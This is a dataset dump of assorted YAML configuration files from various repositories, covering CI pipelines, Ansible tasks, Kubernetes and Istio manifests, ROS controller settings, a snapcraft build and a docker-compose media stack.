code
stringlengths 38
801k
| repo_path
stringlengths 6
263
|
|---|---|
- name: minemeld-webui repo
git:
repo: "{{webui_repo}}"
clone: yes
dest: "{{webui_repo_directory}}"
version: "{{minemeld_version}}"
- name: reconfiguring git to use https
command: git config --global url."https://github.com".insteadOf <EMAIL>@github.com
- name: nodeenv
pip: name=nodeenv
- name: minemeld nodeenv
command: nodeenv -v -n 4.2.6 --npm=2.14.7 --prebuilt -c {{www_venv_directory}} creates="{{www_venv_directory}}"
- name: npm install
command: npm install chdir="{{webui_repo_directory}}"
environment:
NODE_VIRTUAL_ENV: "{{www_venv_directory}}"
PATH: "{{www_venv_directory}}/lib/node_modules/.bin:{{www_venv_directory}}/bin:{{webui_repo_directory}}/node_modules/.bin:{{ ansible_env.PATH }}"
NODE_PATH: "{{www_venv_directory}}/lib/node_modules"
NPM_CONFIG_PREFIX: "{{www_venv_directory}}"
npm_config_prefix: "{{www_venv_directory}}"
- name: bower install
command: bower install --allow-root chdir="{{webui_repo_directory}}"
environment:
NODE_VIRTUAL_ENV: "{{www_venv_directory}}"
PATH: "{{www_venv_directory}}/lib/node_modules/.bin:{{www_venv_directory}}/bin:{{webui_repo_directory}}/node_modules/.bin:{{ ansible_env.PATH }}"
NODE_PATH: "{{www_venv_directory}}/lib/node_modules"
NPM_CONFIG_PREFIX: "{{www_venv_directory}}"
npm_config_prefix: "{{www_venv_directory}}"
- name: typings install
command: typings install chdir="{{webui_repo_directory}}"
environment:
NODE_VIRTUAL_ENV: "{{www_venv_directory}}"
PATH: "{{www_venv_directory}}/lib/node_modules/.bin:{{www_venv_directory}}/bin:{{webui_repo_directory}}/node_modules/.bin:{{ ansible_env.PATH }}"
NODE_PATH: "{{www_venv_directory}}/lib/node_modules"
NPM_CONFIG_PREFIX: "{{www_venv_directory}}"
npm_config_prefix: "{{www_venv_directory}}"
- name: nsp check
command: nsp check chdir="{{webui_repo_directory}}"
environment:
NODE_VIRTUAL_ENV: "{{www_venv_directory}}"
PATH: "{{www_venv_directory}}/lib/node_modules/.bin:{{www_venv_directory}}/bin:{{webui_repo_directory}}/node_modules/.bin:{{ ansible_env.PATH }}"
NODE_PATH: "{{www_venv_directory}}/lib/node_modules"
NPM_CONFIG_PREFIX: "{{www_venv_directory}}"
npm_config_prefix: "{{www_venv_directory}}"
- name: gulp build
command: gulp build chdir="{{webui_repo_directory}}"
environment:
NODE_VIRTUAL_ENV: "{{www_venv_directory}}"
PATH: "{{www_venv_directory}}/lib/node_modules/.bin:{{www_venv_directory}}/bin:{{webui_repo_directory}}/node_modules/.bin:{{ ansible_env.PATH }}"
NODE_PATH: "{{www_venv_directory}}/lib/node_modules"
NPM_CONFIG_PREFIX: "{{www_venv_directory}}"
npm_config_prefix: "{{www_venv_directory}}"
- name: nodeenv permissions
file: path="{{www_venv_directory}}" state=directory recurse=yes owner=minemeld group=minemeld mode="{{file_permissions}}"
- name: minemeld-node-prototypes current link
file:
src: "{{webui_repo_directory}}/dist"
dest: "{{www_directory}}/current"
state: link
owner: minemeld
group: minemeld
|
roles/minemeld/tasks/webui.yml
|
trigger:
- master
pool:
vmImage: 'ubuntu-latest'
strategy:
matrix:
kibana_7_2_1:
kibana_version: 7.2.1
node_version: 10.15.2
kibana_7_3_0:
kibana_version: 7.3.0
node_version: 10.15.2
variables:
build_version: $(kibana_version)-$(Build.BuildNumber)
# https://www.elastic.co/guide/en/kibana/6.7/development-plugin-resources.html
# The Kibana directory must be named kibana, and your plugin directory must be
# located within the sibling kibana-extra folder, for example:
# .
# ├── kibana
# ├── kibana-extra/foo-plugin
# └── kibana-extra/bar-plugin
steps:
- checkout: self
path: kibana-extra/kibana-time-plugin
- task: NodeTool@0
displayName: 'Install Node.js'
inputs:
versionSpec: '$(node_version)'
- task: YarnInstaller@3
displayName: 'Install Yarn'
inputs:
versionSpec: '1.x'
- task: DockerInstaller@0
displayName: 'Install Docker'
inputs:
dockerVersion: '19.03.1'
- task: CmdLine@2
displayName: 'Clone Kibana'
inputs:
script: 'git clone --depth 1 --branch v$(kibana_version) https://github.com/elastic/kibana.git $(Pipeline.Workspace)/kibana'
- task: Yarn@3
displayName: 'Kibana bootstrap'
inputs:
arguments: 'run kbn bootstrap'
- task: Bower@0
displayName: 'Install bower dependencies'
inputs:
command: 'install'
bowerjson: 'bower.json'
- task: Yarn@3
displayName: 'Set plugin version'
inputs:
arguments: 'version --new-version $(build_version) --no-git-tag-version'
- task: CmdLine@2
displayName: 'Set Kibana version'
inputs:
script: mv package.json package.json.bak && jq '.kibana.version = "$(kibana_version)"' package.json.bak > package.json
- task: Yarn@3
displayName: 'Build plugin'
inputs:
arguments: 'run build'
- task: Docker@2
displayName: 'Test plugin installation'
inputs:
command: 'build'
arguments: |
--build-arg KIBANA_VERSION=$(kibana_version)
--build-arg PLUGIN_VERSION=$(build_version)
- task: CopyFiles@2
displayName: 'Copy build artifacts'
inputs:
sourceFolder: '$(Build.SourcesDirectory)/build'
contents: '*.zip'
targetFolder: '$(Build.ArtifactStagingDirectory)'
- task: PublishBuildArtifacts@1
displayName: 'Publish build artifacts'
inputs:
PathtoPublish: '$(Build.ArtifactStagingDirectory)'
ArtifactName: 'drop'
publishLocation: 'Container'
- task: GitHubRelease@0
displayName: 'Publish master'
condition: and(succeeded(), eq(variables['Build.SourceBranch'], 'refs/heads/master'))
inputs:
gitHubConnection: 'github.com_dwickern'
repositoryName: '$(Build.Repository.Name)'
action: 'create'
target: '$(Build.SourceVersion)'
tagSource: 'manual'
tag: '$(build_version)'
title: '$(build_version) (for Kibana $(kibana_version))'
assets: '$(Build.ArtifactStagingDirectory)/*.zip'
isPreRelease: true
changeLogCompareToRelease: 'lastFullRelease'
changeLogType: 'commitBased'
|
azure-pipelines.yml
|
apiVersion: v1
kind: Namespace
metadata:
labels:
env: prod
group: calert
name: calert
---
apiVersion: v1
data:
config.toml: |
# All timeouts and durations are in milliseconds.
[server]
address = ":6000"
socket = "/tmp/calert.sock"
name = "calert"
# WARNING If these timeouts are less than 1s,
# the server connection breaks.
read_timeout=5000
write_timeout=5000
keepalive_timeout=300000
[app]
template_file = "message.tmpl"
[app.http_client]
max_idle_conns = 100
request_timeout = 8000
[app.chat.alertManagerTestRoom]
notification_url = "https://chat.googleapis.com/v1/spaces/xxx/messages?key=abc-xyz&token=token-unique-key%3D"
[app.chat.awesomeRoomTwo]
notification_url = "https://chat.googleapis.com/v1/spaces/xxx/messages?key=abc-xyz&token=token-unique-key%3D"
kind: ConfigMap
metadata:
labels:
env: prod
group: calert
name: app-config-kf68kdh2b8
namespace: calert
---
apiVersion: v1
kind: Service
metadata:
labels:
env: prod
group: calert
name: calert-redis-calert
namespace: calert
spec:
ports:
- port: 6379
protocol: TCP
selector:
env: prod
group: calert
service: redis
tier: cache
---
apiVersion: v1
kind: Service
metadata:
labels:
env: prod
group: calert
name: calert-service
namespace: calert
spec:
ports:
- port: 6000
protocol: TCP
selector:
app: calert
env: prod
group: calert
tier: api
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
env: prod
group: calert
name: calert-app
namespace: calert
spec:
replicas: 1
selector:
matchLabels:
env: prod
group: calert
service: app
template:
metadata:
labels:
env: prod
group: calert
service: app
tier: api
spec:
containers:
- image: mrkaran/calert:1.8.0-stable
name: calert
ports:
- containerPort: 6000
resources:
limits:
cpu: 500m
memory: 400Mi
requests:
cpu: 250m
memory: 200Mi
volumeMounts:
- mountPath: /etc/calert/
name: config-dir
volumes:
- configMap:
name: app-config-kf68kdh2b8
name: config-dir
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
env: prod
group: calert
name: calert-redis
namespace: calert
spec:
replicas: 1
selector:
matchLabels:
env: prod
group: calert
service: redis
template:
metadata:
labels:
env: prod
group: calert
service: redis
tier: cache
spec:
containers:
- image: redis:5.0-alpine
name: redis
ports:
- containerPort: 6379
resources:
limits:
cpu: 300m
memory: 200Mi
requests:
cpu: 150m
memory: 100Mi
|
kustomize/build/deploy.yaml
|
version: 2
config_android: &config_android
docker:
- image: circleci/android:api-29
working_directory: ~/project
environment:
JAVA_TOOL_OPTIONS: "-Xmx1024m"
GRADLE_OPTS: "-Dorg.gradle.daemon=false -Dorg.gradle.workers.max=2 -Dkotlin.incremental=false -Dkotlin.compiler.execution.strategy=in-process"
TERM: dumb
setup_ftl: &setup_ftl
- run:
name: Authorize gcloud and set config defaults
command: |
echo $GCLOUD_SERVICE_KEY | base64 -di > ${HOME}/gcloud-service-key.json
sudo gcloud auth activate-service-account --key-file=${HOME}/gcloud-service-key.json
sudo gcloud --quiet config set project ${GOOGLE_PROJECT_ID}
update_sdk: &update_sdk
run:
name: Update SDK
command: |
yes | sdkmanager --licenses || true
sdkmanager "platform-tools" "platforms;android-29"
jobs:
build_and_setup:
<<: *config_android
steps:
- <<: *update_sdk
- checkout
- run:
name: Build test and lint
command: |
./gradlew assembleStaging assembleStagingAndroidTest testDebugUnitTest testReleaseUnitTest lintDebug
- run:
name: Save test results
command: |
mkdir -p ~/junit/
find . -type f -regex ".*/build/test-results/.*xml" -exec cp {} ~/junit/ \;
when: always
- store_test_results:
path: ~/junit
- store_artifacts:
path: ~/junit
destination: tests
- store_artifacts:
path: ./mobile/build/reports
destination: reports/
- persist_to_workspace:
root: .
paths:
- ./mobile/build
run_ftl:
<<: *config_android
steps:
- attach_workspace:
at: .
- <<: *setup_ftl
- run:
name: Test with Firebase Test Lab
command: |
BUILD_DIR=build_${CIRCLE_BUILD_NUM}
sudo gcloud firebase test android run \
--app mobile/build/outputs/apk/staging/mobile-staging.apk \
--test mobile/build/outputs/apk/androidTest/staging/mobile-staging-androidTest.apk \
--results-bucket cloud-test-${GOOGLE_PROJECT_ID}-iosched \
--results-dir=${BUILD_DIR}
- run:
name: Download results
command: |
BUILD_DIR=build_${CIRCLE_BUILD_NUM}
sudo pip install -U crcmod
mkdir firebase_test_results
sudo gsutil -m mv -r -U `sudo gsutil ls gs://cloud-test-${GOOGLE_PROJECT_ID}-iosched/${BUILD_DIR} | tail -1` firebase_test_results/ | true
- store_artifacts:
path: firebase_test_results
workflows:
version: 2
build_and_test:
jobs:
- build_and_setup
- run_ftl:
requires:
- build_and_setup
|
.circleci/config.yml
|
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
name: todo-pvc
spec:
accessModes:
- "ReadWriteMany"
resources:
requests:
storage: "100Mi"
---
apiVersion: v1
kind: ConfigMap
metadata:
name: todo-postgres-configuration
labels:
app: todo-postgres
data:
POSTGRES_DB: todo
POSTGRES_USER: postgres
POSTGRES_PASSWORD: password
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: todo
spec:
replicas: 1
selector:
matchLabels:
app: todo
template:
metadata:
labels:
app: todo
spec:
volumes:
- name: todo-postgresdb-storage
persistentVolumeClaim:
claimName: todo-pvc
containers:
- image: postgres:9.6.3
name: my-database
envFrom:
- configMapRef:
name: todo-postgres-configuration
ports:
- containerPort: 5432
resources: {}
volumeMounts:
- mountPath: "/var/lib/postgresql/data:Z"
name: todo-postgresdb-storage
- name: todo
image: index.docker.io/cage1016/gokit-todo
env:
- name: QS_DB
value: "todo"
- name: QS_DB_HOST
value: "localhost"
- name: QS_DB_PASS
value: "password"
- name: QS_DB_PORT
value: "5432"
- name: QS_DB_SSL_CERT
value: ""
- name: QS_DB_SSL_KEY
value: ""
- name: QS_DB_SSL_MODE
value: ""
- name: QS_DB_SSL_ROOT_CERT
value: ""
- name: QS_DB_USER
value: "postgres"
- name: QS_GRPC_PORT
value: "10121"
- name: QS_HTTP_PORT
value: "10120"
- name: QS_LOG_LEVEL
value: "info"
---
kind: Service
apiVersion: v1
metadata:
name: todo
spec:
selector:
app: todo
ports:
- port: 80
name: http
targetPort: 10120
- port: 8000
name: grpc
targetPort: 10121
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: frontend
labels:
app: frontend
spec:
replicas: 1
selector:
matchLabels:
app: frontend
template:
metadata:
labels:
app: frontend
spec:
containers:
- name: frontend
image: index.docker.io/cage1016/gokit-todo-frontend:latest
---
kind: Service
apiVersion: v1
metadata:
name: frontend
spec:
selector:
app: frontend
ports:
- port: 80
name: http
targetPort: 80
---
apiVersion: networking.istio.io/v1alpha3
kind: Gateway
metadata:
name: todo-http-gateway
spec:
selector:
istio: ingressgateway # use istio default controller
servers:
- port:
number: 80
name: http
protocol: HTTP
hosts:
- "*"
---
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
name: todo-ingress-http
spec:
hosts:
- "*"
gateways:
- todo-http-gateway
http:
- match:
- uri:
prefix: /api/v1/todo/
rewrite:
uri: /
route:
- destination:
host: todo
port:
number: 80
- match:
- uri:
prefix: /
route:
- destination:
host: frontend
port:
number: 80
---
apiVersion: networking.istio.io/v1alpha3
kind: Gateway
metadata:
name: todo-grpc-gateway
spec:
selector:
istio: ingressgateway
servers:
- hosts:
- "*"
port:
name: grpc
number: 443
protocol: HTTP
---
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
name: todo-ingress-grpc
spec:
hosts:
- "*"
gateways:
- todo-grpc-gateway
http:
- match:
- uri:
prefix: /pb.Todo
route:
- destination:
host: todo
port:
number: 8000
|
deployments/k8s-istio.yaml
|
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: giantswarm-admin
subjects:
- kind: User
name: {{.Cluster.Kubernetes.API.Domain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
---
## Worker
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubelet
subjects:
- kind: User
name: {{.Cluster.Kubernetes.Kubelet.Domain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: system:node
apiGroup: rbac.authorization.k8s.io
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: proxy
subjects:
- kind: User
name: {{.Cluster.Kubernetes.Kubelet.Domain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: system:node-proxier
apiGroup: rbac.authorization.k8s.io
---
## Master
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kube-controller-manager
subjects:
- kind: User
name: {{.Cluster.Kubernetes.API.Domain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: system:kube-controller-manager
apiGroup: rbac.authorization.k8s.io
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kube-scheduler
subjects:
- kind: User
name: {{.Cluster.Kubernetes.API.Domain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: system:kube-scheduler
apiGroup: rbac.authorization.k8s.io
---
## node-operator
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: node-operator
subjects:
- kind: User
name: node-operator.{{.BaseDomain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: node-operator
apiGroup: rbac.authorization.k8s.io
---
## prometheus-external is prometheus from host cluster
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: prometheus-external
subjects:
- kind: User
name: prometheus.{{.BaseDomain}}
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: prometheus-external
apiGroup: rbac.authorization.k8s.io
|
files/k8s-resource/rbac_bindings.yaml
|
items:
- uid: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse
name: AsyncBatchAnnotateFilesResponse
id: AsyncBatchAnnotateFilesResponse
summary: |-
Response to an async batch file annotation request.
Generated from protobuf message <code>google.cloud.vision.v1.AsyncBatchAnnotateFilesResponse</code>
type: class
langs:
- php
children:
- \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::__construct()
- \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::getResponses()
- \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::setResponses()
properties:
- name: responses
description: |-
The list of file annotation responses, one for each request in
AsyncBatchAnnotateFilesRequest.
Generated from protobuf field <code>repeated .google.cloud.vision.v1.AsyncAnnotateFileResponse responses = 1;</code>
- uid: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::__construct()
name: __construct
id: __construct
summary: Constructor.
parent: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse
type: method
langs:
- php
parameters:
- type: array
name: data
description: '{ Optional. Data for populating the Message object. @type
\Google\Cloud\Vision\V1\AsyncAnnotateFileResponse[]|\Google\Protobuf\Internal\RepeatedField
$responses The list of file annotation responses, one for each request
in AsyncBatchAnnotateFilesRequest. }'
- uid: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::getResponses()
name: getResponses
id: getResponses
summary: |-
The list of file annotation responses, one for each request in
AsyncBatchAnnotateFilesRequest.
Generated from protobuf field <code>repeated .google.cloud.vision.v1.AsyncAnnotateFileResponse responses = 1;</code>
parent: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse
type: method
langs:
- php
- uid: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse::setResponses()
name: setResponses
id: setResponses
summary: |-
The list of file annotation responses, one for each request in
AsyncBatchAnnotateFilesRequest.
Generated from protobuf field <code>repeated .google.cloud.vision.v1.AsyncAnnotateFileResponse responses = 1;</code>
parent: \Google\Cloud\Vision\V1\AsyncBatchAnnotateFilesResponse
type: method
langs:
- php
parameters:
- type: \Google\Cloud\Vision\V1\AsyncAnnotateFileResponse[]|\Google\Protobuf\Internal\RepeatedField
name: var
|
testdata/golden/V1.AsyncBatchAnnotateFilesResponse.yml
|
name: Gradr
on:
pull_request:
branches:
- master
jobs:
lint:
name: audit code-style
runs-on: ubuntu-latest
strategy:
matrix:
python-version: [2.7, 3.5, 3.6, 3.7, 3.8]
steps:
- name: Checkout Repo
uses: actions/checkout@v2
- name: Prepare To Install
uses: actions/setup-python@v1
with:
node-version: ${{ matrix.python-version }}
- name: Install Deps
run: |
pip install flake8
flake8 .
- name: Run Audits
run: yarn eslint ./src/
ch-1:
needs: lint
name: audit challenge 1
runs-on: ubuntu-latest
strategy:
matrix:
python-version: [3.x]
steps:
- name: Checkout Repo
uses: actions/checkout@v2
- name: Prepare To Install
uses: actions/setup-python@v1
with:
node-version: ${{ matrix.python-version }}
- name: Install Deps
run: |
pip install flake8
flake8 .
- name: Prepare Audits
uses: actions/checkout@v2
with:
repository: chalu/js-audits
path: audits
- name: Run Audits
run: flake8 audits/ch-1
- name: Report Audit Stats
uses: ./.github/actions/ch-1
if: always()
ch-2:
needs: ch-1
name: audit challenge 2
runs-on: ubuntu-latest
strategy:
matrix:
node-version: [12.x]
steps:
- name: Checkout Repo
uses: actions/checkout@v2
- name: Prepare To Install
uses: actions/setup-node@v1
with:
node-version: ${{ matrix.node-version }}
- name: Install Deps
run: |
pip install
yarn add jest @babel/core @babel/preset-env babel-jest axios @actions/core @actions/github
- name: Prepare Audits
uses: actions/checkout@v2
with:
repository: chalu/js-audits
path: audits
- name: Run Audits
run: npx jest audits/ch-2 --json --outputFile=audits/ch-2.json --noStackTrace
- name: Report Audit Stats
uses: ./.github/actions/ch-2
if: always()
ch-3:
needs: ch-2
name: audit challenge 3
runs-on: ubuntu-latest
strategy:
matrix:
python-version: [3.x]
steps:
- name: Checkout Repo
uses: actions/checkout@v2
- name: Prepare To Install
uses: actions/setup-node@v1
with:
node-version: ${{ matrix.node-version }}
- name: Install Deps
run: |
pip install flake8
flake8 .
- name: Prepare Audits
uses: actions/checkout@v2
with:
repository: chalu/js-audits
path: audits
- name: Run Audits
run: npx jest audits/ch-3 --json --outputFile=audits/ch-3.json --noStackTrace
- name: Report Audit Stats
uses: ./.github/actions/ch-3
if: always()
|
.github/workflows/gradr.yml
|
boxbot:
# Publish all joint states----------------------------------------
joint_state_controller:
type: joint_state_controller/JointStateController
publish_rate: 50
# Position controllers -------------------------------------------
left_shoulder_1_controller:
type: position_controllers/JointPositionController
joint: left_shoulder_1_joint
left_shoulder_2_controller:
type: position_controllers/JointPositionController
joint: left_shoulder_2_joint
left_elbow_controller:
type: position_controllers/JointPositionController
joint: left_elbow_joint
left_wrist_1_controller:
type: position_controllers/JointPositionController
joint: left_wrist_1_joint
left_wrist_2_controller:
type: position_controllers/JointPositionController
joint: left_wrist_2_joint
left_gripper_controller:
type: position_controllers/JointPositionController
joint: left_gripper_joint
left_gripper_mimic_controller:
type: position_controllers/JointPositionController
joint: left_gripper_prismatic_joint_2
right_shoulder_1_controller:
type: position_controllers/JointPositionController
joint: right_shoulder_1_joint
right_shoulder_2_controller:
type: position_controllers/JointPositionController
joint: right_shoulder_2_joint
right_elbow_controller:
type: position_controllers/JointPositionController
joint: right_elbow_joint
right_wrist_1_controller:
type: position_controllers/JointPositionController
joint: right_wrist_1_joint
right_wrist_2_controller:
type: position_controllers/JointPositionController
joint: right_wrist_2_joint
right_gripper_controller:
type: position_controllers/JointPositionController
joint: right_gripper_joint
right_gripper_mimic_controller:
type: position_controllers/JointPositionController
joint: right_gripper_prismatic_joint_2
gazebo_ros_control/pid_gains:
left_shoulder_1_joint: {p: 50.0, i: 0.1, d: 1.0}
left_shoulder_2_joint: {p: 50.0, i: 0.1, d: 1.0}
left_elbow_joint: {p: 50.0, i: 0.1, d: 1.0}
left_wrist_1_joint: {p: 50.0, i: 0.1, d: 1.0}
left_wrist_2_joint: {p: 50.0, i: 0.1, d: 1.0}
left_gripper_joint: {p: 50.0, i: 0.1, d: 1.0}
left_gripper_prismatic_joint_2: {p: 50.0, i: 0.1, d: 1.0}
right_shoulder_1_joint: {p: 50.0, i: 0.1, d: 1.0}
right_shoulder_2_joint: {p: 50.0, i: 0.1, d: 1.0}
right_elbow_joint: {p: 50.0, i: 0.1, d: 1.0}
right_wrist_1_joint: {p: 50.0, i: 0.1, d: 1.0}
right_wrist_2_joint: {p: 50.0, i: 0.1, d: 1.0}
right_gripper_joint: {p: 50.0, i: 0.1, d: 1.0}
right_gripper_prismatic_joint_2: {p: 50.0, i: 0.1, d: 1.0}
|
boxbot_control/config/boxbot_5dof_control.yaml
|
name: edgex-device-rfid-llrp
base: core18
version: "replace-me"
version-script: |
VERSION=$(shell cat ./VERSION 2>/dev/null || echo 0.0.0)
echo $VERSION-$(date +%Y%m%d)+$(git rev-parse --short HEAD)
license: Apache-2.0
summary: EdgeX Device LLRP Micro Service
title: EdgeX Device LLRP Micro Service
description: |
The EdgeX Device LLRP service for connecting LLRP based RFID devices to EdgeX.
Initially the daemon in the snap is disabled - a device profile must be
provisioned externally with core-metadata or provided to device-rfid-llrp-go inside
"$SNAP_DATA/config/device-rfid-llrp-go/res" before starting.
# TODO: add armhf when the project supports this
architectures:
- build-on: amd64
- build-on: arm64
grade: stable
confinement: strict
# delhi: 0, edinburgh: 1, fuji: 2, geneva: 3
epoch: 3
apps:
device-rfid-llrp-go:
adapter: none
command: bin/device-rfid-llrp-go $CONFIG_PRO_ARG $CONF_ARG $REGISTRY_ARG
environment:
CONFIG_PRO_ARG: "-cp=consul.http://localhost:8500"
CONF_ARG: "--confdir=$SNAP_DATA/config/device-rfid-llrp-go/res"
REGISTRY_ARG: "--registry"
DEVICE_PROFILESDIR: "$SNAP_DATA/config/device-rfid-llrp-go/res"
daemon: simple
plugs: [network, network-bind]
parts:
go:
plugin: nil
source: snap/local
build-packages: [curl]
override-build: |
# use dpkg architecture to figure out our target arch
# note - we specifically don't use arch
case "$(dpkg --print-architecture)" in
amd64)
FILE_NAME=go1.15.2.linux-amd64.tar.gz
FILE_HASH=b49fda1ca29a1946d6bb2a5a6982cf07ccd2aba849289508ee0f9918f6bb4552
;;
arm64)
FILE_NAME=go1.15.2.linux-arm64.tar.gz
FILE_HASH=c8ec460cc82d61604b048f9439c06bd591722efce5cd48f49e19b5f6226bd36d
;;
# armhf)
# FILE_NAME=go1.15.2.linux-armv6l.tar.gz
# FILE_HASH=c12e2afdcb21e530d332d4994919f856dd2a676e9d67034c7d6fefcb241412d9
# ;;
# i386)
# FILE_NAME=go1.15.2.linux-386.tar.gz
# FILE_HASH=5a91080469df6b91f1022bdfb0ca75e01ca50387950b13518def3d0a7f6af9f1
# ;;
esac
# download the archive, failing on ssl cert problems
curl https://dl.google.com/go/$FILE_NAME -O
echo "$FILE_HASH $FILE_NAME" > sha256
sha256sum -c sha256 | grep OK
tar -C $SNAPCRAFT_STAGE -xf go*.tar.gz --strip-components=1
prime:
- "-*"
device-rfid-llrp-go:
source: .
plugin: make
build-packages: [git]
after: [go]
override-build: |
cd $SNAPCRAFT_PART_SRC
make build
install -DT "./cmd/device-rfid-llrp-go" "$SNAPCRAFT_PART_INSTALL/bin/device-rfid-llrp-go"
install -d "$SNAPCRAFT_PART_INSTALL/config/device-rfid-llrp-go/res/"
cat "./cmd/res/configuration.toml" | \
sed -e s:\"./device-rfid-llrp-go.log\":\'\$SNAP_COMMON/device-rfid-llrp-go.log\': \
-e s:'ProfilesDir = \"./res\"':'ProfilesDir = \"\$SNAP_DATA/config/device-rfid-llrp-go/res\"': > \
"$SNAPCRAFT_PART_INSTALL/config/device-rfid-llrp-go/res/configuration.toml"
if [ "$(find ./cmd/res/ -maxdepth 1 -name *.yaml -print -quit)" ]; then
for fpath in ./cmd/res/*.yaml; do
fname=$(basename "$fpath")
install -DT "./cmd/res/${fname}" \
"$SNAPCRAFT_PART_INSTALL/config/device-rfid-llrp-go/res/${fname}"
done
fi
install -DT "./Attribution.txt" \
"$SNAPCRAFT_PART_INSTALL/usr/share/doc/device-rfid-llrp-go/Attribution.txt"
install -DT "./LICENSE" \
"$SNAPCRAFT_PART_INSTALL/usr/share/doc/device-rfid-llrp-go/LICENSE"
|
snap/snapcraft.yaml
|
---
- name: Get master-eligible nodes
set_fact:
master_eligible_nodes: |
{%- set res = [] -%}
{%- set master_eligible_hostnames = (groups['master'] if groups['master'] is defined else groups['data']) | sort -%}
{%- for master_eligible_hostname in master_eligible_hostnames -%}
{%- set _ = res.append({'hostname': master_eligible_hostname, 'ip': hostvars[master_eligible_hostname]['ansible_host']}) -%}
{%- endfor -%}
{{res}}
- name: master_eligible_nodes
debug: msg={{master_eligible_nodes}}
run_once: yes
## old - for reference.
#- name: Get elasticsearch hosts when DNS in use
# block:
# - name: Get all master/data nodes (when using DNS)
# set_fact:
# es_unicast_nodes: "[{% for node in query('inventory_hostnames','data,master', errors='ignore') | sort %}'{{ node }}.{{cluster_vars.dns_user_domain}}'{{',' if not loop.last else ''}}{% endfor %}]"
#
# - name: Get master-eligible nodes (when using DNS)
# set_fact:
# master_eligible_nodes: "{{ (groups['master'] if groups['master'] is defined else groups['data']) | map('regex_replace', '^(.*)$', '\\1.' + cluster_vars.dns_user_domain) | sort }}"
# when: (cluster_vars.dns_server is defined and cluster_vars.dns_server != "")
#
#- name: Get elasticsearch hosts when DNS not in use
# block:
# - name: Get all master/data nodes (when not using DNS)
# set_fact:
# es_unicast_nodes: "[{% for node in query('inventory_hostnames','data,master', errors='ignore') | sort %}'{{ hostvars[node]['ansible_host'] }}'{{',' if not loop.last else ''}}{% endfor %}]"
#
# - name: Get master-eligible nodes (when not using DNS)
# set_fact:
# master_eligible_nodes: "{{ (groups['master'] if groups['master'] is defined else groups['data']) | map('extract', hostvars, 'ansible_host') | sort }}"
# when: (cluster_vars.dns_server is not defined or cluster_vars.dns_server == "")
#
#- name: es_unicast_nodes
# debug: msg={{es_unicast_nodes}}
# run_once: yes
|
facts/tasks/main.yml
|
version: '2'
services:
# proxy:
# container_name: 'traefik'
# image: traefik:1.5
# restart: always
# ports:
# - '8600:80'
# networks:
# - proxy
# volumes:
# - '/var/run/docker.sock:/var/run/docker.sock'
# - './traefik.toml:/traefik.toml'
portainer:
image: portainer/portainer:latest
container_name: portainer
restart: always
ports:
- '9000:9000'
volumes:
- '/mnt/data/portainer:/data'
- '/var/run/docker.sock:/var/run/docker.sock'
media:
container_name: 'media'
image: madslundt/cloud-media-scripts
restart: always
privileged: true
devices:
- /dev/fuse
cap_add:
- CAP_MKNOD
- CAP_SYS_ADMIN
environment:
ENCRYPT_MEDIA: 0
PUID: 1000
PGID: 1000
volumes:
- '/mnt/data/media/unionfs:/local-media:shared'
- '/mnt/data/media/local:/local-decrypt:shared'
- '/mnt/data/media/config:/config'
- '/mnt/data/media/chunks:/chunks'
- '/mnt/data/media/db:/data/db'
- '/mnt/data/media/logs:/log'
rutorrent:
container_name: 'rutorrent'
image: linuxserver/rutorrent:latest
restart: always
depends_on:
- media
ports:
- '5000:5000'
- '51413:51413'
- '6881:6881/udp'
- '80:80'
environment:
PUID: 1000
PGID: 1000
TZ: 'Europe/Copenhagen'
volumes:
- '/mnt/data/rutorrent/config:/config'
- '/mnt/data/rutorrent/downloads:/downloads'
sonarr:
container_name: 'sonarr'
image: linuxserver/sonarr:latest
restart: always
depends_on:
- media
- rutorrent
ports:
- '8989:8989'
environment:
PUID: 1000
PGID: 1000
TZ: 'Europe/Copenhagen'
volumes:
- '/mnt/data/sonarr/config:/config'
- '/mnt/data/media/unionfs:/unionfs:shared'
- '/mnt/data/rutorrent/downloads:/downloads'
radarr:
container_name: 'radarr'
image: linuxserver/radarr:latest
restart: always
depends_on:
- media
- rutorrent
ports:
- '7878:7878'
environment:
PUID: 1000
PGID: 1000
TZ: 'Europe/Copenhagen'
volumes:
- '/mnt/data/radarr/config:/config'
- '/mnt/data/media/unionfs:/unionfs:shared'
- '/mnt/data/rutorrent/downloads:/downloads'
jackett:
container_name: 'jacket'
image: linuxserver/jackett:latest
restart: always
ports:
- '9117:9117'
environment:
PUID: 1000
PGID: 1000
